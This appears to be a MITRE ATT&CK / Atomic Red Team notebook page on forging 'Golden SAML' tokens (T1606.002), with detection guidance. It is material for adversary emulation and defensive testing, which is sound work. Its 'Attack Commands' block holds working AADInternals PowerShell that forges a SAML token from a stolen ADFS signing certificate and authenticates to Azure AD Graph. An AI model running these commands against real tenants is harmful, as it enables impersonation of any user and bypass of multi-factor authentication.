# T1606.002 - SAML Tokens
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)

An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)

## Atomic Tests

### Atomic Test #1 - Golden SAML
Forge a "Golden SAML" token which allows to impersonate any Azure AD user, and authenticate to AADGraph (as a proof). 
You will need the ADFS token signing certificate (see T1552.004 to export it).
More info here : https://o365blog.com/post/adfs/

**Supported Platforms:** azure-ad
#### Dependencies:  Run with `powershell`!
##### Description: AADInternals module must be installed.

##### Check Prereq Commands:
```powershell
if (Get-Module AADInternals) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name AADInternals -Force

```

In [ ]:
Invoke-AtomicTest T1606.002 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module AADInternals -Force
$saml = New-AADIntSAMLToken -ImmutableID "aehgdqBTZV50DKQZmNJ8mg==" -PfxFileName ".\ADFS_signing.pfx" -Issuer "http://contoso.com/adfs/services/trust/"
$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache
if ($conn) { Write-Host "`nSuccessfully connected as $($conn.User)" } else { Write-Host "`nThe connection failed" }
Write-Host "End of Golden SAML"
```

In [ ]:
Invoke-AtomicTest T1606.002 -TestNumbers 1

## Detection
This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)

Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)